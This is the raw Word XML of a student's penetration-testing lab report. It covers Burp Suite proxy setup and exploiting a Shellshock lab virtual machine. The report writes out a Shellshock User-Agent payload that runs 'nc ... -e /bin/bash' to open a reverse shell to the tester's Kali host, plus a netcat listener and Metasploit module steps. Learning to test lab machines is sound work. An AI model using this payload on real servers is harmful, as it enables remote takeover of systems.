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CF1" w:rsidRDefault="00DD178C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD178C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>MY REPORT ON PENETRATION TESTING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060629A" w:rsidRDefault="00DD178C" w:rsidP="0060629A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I learned that burp suite is a tool used </w:t>
      </w:r>
      <w:r w:rsidR="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">as an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>intercept</w:t>
      </w:r>
      <w:r w:rsidR="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">or proxy. It sits between a web browser a the target web site </w:t>
      </w:r>
      <w:r w:rsidR="00665D6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>server, allowing</w:t>
      </w:r>
      <w:r w:rsidR="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> you to pause,</w:t>
      </w:r>
      <w:r w:rsidR="00665D6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00665D6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">pect and modify the data </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>before  it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> reaches the server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92CAF" w:rsidRDefault="0060629A" w:rsidP="0060629A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060629A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE5D1EE" wp14:editId="1D335896">
            <wp:extent cx="5611008" cy="301984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AF" w:rsidRDefault="00D92CAF" w:rsidP="00D92CAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0060629A" w:rsidRDefault="00D92CAF" w:rsidP="00D92CAF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="283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After this installation process, we went to the proxy settings in the options bar which we saw the ip address and the port number under the interface </w:t>
      </w:r>
      <w:r w:rsidR="001E13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E13F2" w:rsidRDefault="001E13F2" w:rsidP="00D92CAF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2835"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E13F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DCC96D8" wp14:editId="363F7F1A">
            <wp:extent cx="5943600" cy="1884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F2" w:rsidRDefault="001E13F2" w:rsidP="001E13F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000050D6" w:rsidRDefault="001E13F2" w:rsidP="00D300ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>From this point I was able to configure the networ</w:t>
      </w:r>
      <w:r w:rsidR="007765AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> settings for the proxy. </w:t>
      </w:r>
      <w:r w:rsidR="007765AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Visiting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the site </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00FB25AE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://burp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , we were to download and import the CA certificate which will enable me to </w:t>
      </w:r>
      <w:r w:rsidR="007765AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>visit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure</w:t>
      </w:r>
      <w:r w:rsidR="004623AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and unsecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007765AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sites (</w:t>
      </w:r>
      <w:r w:rsidR="004623AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTP/S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004623AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007765AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>so,</w:t>
      </w:r>
      <w:r w:rsidR="004623AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> we made a request to google servers and turn on the intercept in order to see the request</w:t>
      </w:r>
      <w:r w:rsidR="007765AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006351F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(packet)</w:t>
      </w:r>
      <w:r w:rsidR="004623AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> being made to google, where we can modify it a</w:t>
      </w:r>
      <w:r w:rsidR="000050D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nd send.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000050D6" w:rsidRDefault="000050D6" w:rsidP="00D300ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000050D6" w:rsidRDefault="000050D6" w:rsidP="00D300E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Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000050D6" w:rsidRDefault="000050D6" w:rsidP="00D300ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This is a</w:t>
      </w:r>
      <w:r w:rsidR="00AF1D0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability that allow an attacker to remotely execute unauthorized commands on a target sy</w:t>
      </w:r>
      <w:r w:rsidR="00AF1D0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>stem. This the machine where we actually carry out or penetration testing on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF1D0C" w:rsidRDefault="00AF1D0C" w:rsidP="00D300ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Firstly:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF1D0C" w:rsidRDefault="00AF1D0C" w:rsidP="00AF1D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F1D0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We install shellshock virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="00BC4310">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Where the command “ifconfi</w:t>
      </w:r>
      <w:r w:rsidR="00301DE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>g” is used to get the ip address the virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0744C" w:rsidRDefault="00C0744C" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C0744C" w:rsidRDefault="00BC4310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E147A1" wp14:editId="6385AFBF">
            <wp:extent cx="3352800" cy="3324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nt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77" cy="332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E8" w:rsidRDefault="00301DE8" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C0744C" w:rsidRDefault="00301DE8" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301DE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476BE714" wp14:editId="35DD68C5">
            <wp:extent cx="3829016" cy="21145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9972" cy="212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E8" w:rsidRDefault="00301DE8" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00711738" w:rsidRDefault="00301DE8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After this step, we copied the ip address and searched it on our </w:t>
      </w:r>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> fire fox </w:t>
      </w:r>
      <w:r w:rsidR="00665D6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see the page.</w:t>
      </w:r>
      <w:r w:rsidR="00711738">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> For the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00711738">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00711738">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> step we opened burp suit and click on the “target” ba</w:t>
      </w:r>
      <w:r w:rsidR="00665D6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00711738">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see the request we made.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301DE8" w:rsidRDefault="00711738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="00CD3020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2862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entesterla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738" w:rsidRDefault="00711738" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C0744C" w:rsidRPr="00575D2F" w:rsidRDefault="00922468" w:rsidP="00575D2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685927" cy="4448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urp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82" cy="44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D2F" w:rsidRPr="00575D2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0744C" w:rsidRDefault="00C0744C" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C0744C" w:rsidRDefault="00C0744C" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C0744C" w:rsidRDefault="00575D2F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Here, the request(/cgi-bin/status) is was sent to the repeater where the user-agent is modified from Mozilla/5.0…</w:t>
      </w:r>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>…...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a new user agent</w:t>
      </w:r>
      <w:r w:rsidR="00FB3D6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">.ie the syntax used is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FB3D6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“ (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FB3D6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">) { :;}; “ which runs the command after this syntax on the server. </w:t>
      </w:r>
      <w:r w:rsidR="00AC500A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00FB3D6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifies it as the entire vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00AC500A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. The command goes thus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC500A" w:rsidRDefault="00AC500A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C500A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>User-agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: ()</w:t>
      </w:r>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>;}; /bin/bash -c ‘nc “ip address of kali” “port number” -e /bin/bash’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17031" w:rsidRDefault="00D17031" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC500A" w:rsidRDefault="00252D23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Where:</w:t>
      </w:r>
      <w:r w:rsidR="00D17031">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash – which tell the target to execute a certain command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17031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-</w:t>
      </w:r>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>c: for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17031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</w:t>
      </w:r>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nc:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> nat cat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17031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-e: for what we want to </w:t>
      </w:r>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17031" w:rsidRPr="00AC500A" w:rsidRDefault="00D17031" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC500A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93BDD8" wp14:editId="3BE6C55C">
            <wp:extent cx="59436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rp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44C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D17031" w:rsidRDefault="00D17031" w:rsidP="00C0744C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For the re</w:t>
      </w:r>
      <w:r w:rsidR="00A04353">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">sponse we had a status code of “500” which means “internal server error” because it does not </w:t>
      </w:r>
      <w:r w:rsidR="00252D23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>recognize</w:t>
      </w:r>
      <w:r w:rsidR="00A04353">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the current user agent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00665D6E" w:rsidRDefault="00665D6E" w:rsidP="00C0744C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665D6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF78F6D" wp14:editId="574D3E5E">
            <wp:extent cx="5943600" cy="3695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C" w:rsidRDefault="005D729C" w:rsidP="00D300ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>With the command “nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>lvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> “’the specified port number</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>’“ I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was able to penetrate the shellshock virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="00371098">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and have root access to it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="00371098" w:rsidP="00D300ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00371098">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A0FED1A" wp14:editId="18C7A602">
            <wp:extent cx="5943600" cy="2007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C" w:rsidRPr="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="00371098" w:rsidP="005D72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Using the Metasploit frame work Msfconsole, I was able to penetrate the shellshock machine by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>inputing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00371098" w:rsidRDefault="00371098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Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00371098" w:rsidRDefault="00371098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Search shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00371098" w:rsidRDefault="00371098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Use exploit/multi/</w:t>
      </w:r>
      <w:r w:rsidR="001C2D55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C2D55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>apsche_mod_cgi_bash_env_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001C2D55" w:rsidRDefault="001C2D55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Show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2D55" w:rsidRDefault="001C2D55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Set RHOST “IP of kali-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
